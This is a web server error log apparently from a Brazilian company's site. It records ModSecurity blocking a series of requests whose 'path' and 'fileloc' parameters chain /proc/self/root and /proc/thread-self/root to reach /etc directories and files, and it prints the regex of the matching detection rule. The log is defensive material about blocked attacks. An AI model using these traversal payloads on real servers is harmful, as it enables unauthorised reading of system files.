[Mon Mar 16 10:17:56.230126 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.243.203:50990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDBP9ocpUE4ed4uDzfeQAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:17:57.550274 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:36874] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDBf9ocpUE4ed4uDzfewAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:17:57.750455 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.241.46:50176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDBf9ocpUE4ed4uDzffAAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:17:58.882266 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.243.203:36878] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDBv9ocpUE4ed4uDzffQAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:18:03.360732 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:49994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDC3jZBu2q05ozVU9HswAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:18:03.610103 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:38034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDC_9ocpUE4ed4uDzfgwAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:18:06.991089 2026] [:error] [pid 11972:tid 140411574073088] [client 74.7.241.46:38042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDDpqj1wV0Si-OkefbRAAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:18:23.183116 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:34400] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDH7ABkC4fWIHEf8HdTgAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:18:24.590159 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.241.46:50822] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDIAlT9VtDQc7bgUyeRgAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:18:26.851372 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.241.46:50830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDIpqj1wV0Si-OkefbTgAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:18:30.610969 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:50004] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDJrABkC4fWIHEf8HdVgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:18:32.817187 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:42278] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDKP9ocpUE4ed4uDzfiQAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:18:34.100285 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:42282] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDKrABkC4fWIHEf8HdVwAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:18:35.325321 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:42296] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDK7ABkC4fWIHEf8HdWAAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:18:39.749127 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:42298] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDL5qj1wV0Si-OkefbVQAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:18:42.107775 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.241.46:52692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDMpqj1wV0Si-OkefbVwAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:18:47.892714 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.243.203:56120] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDN9SswJuvopo3lOhSSQAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:18:50.712495 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:52704] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDOv9ocpUE4ed4uDzfkQAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:18:55.343186 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.241.46:35646] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDPwlT9VtDQc7bgUyeUAAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:19:43.428693 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.243.203:59686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDb7ABkC4fWIHEf8HdjQAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:19:44.699662 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.243.203:48222] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDcHbQATo66fKoS7w_jgAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:20:15.526945 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.241.46:35648] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 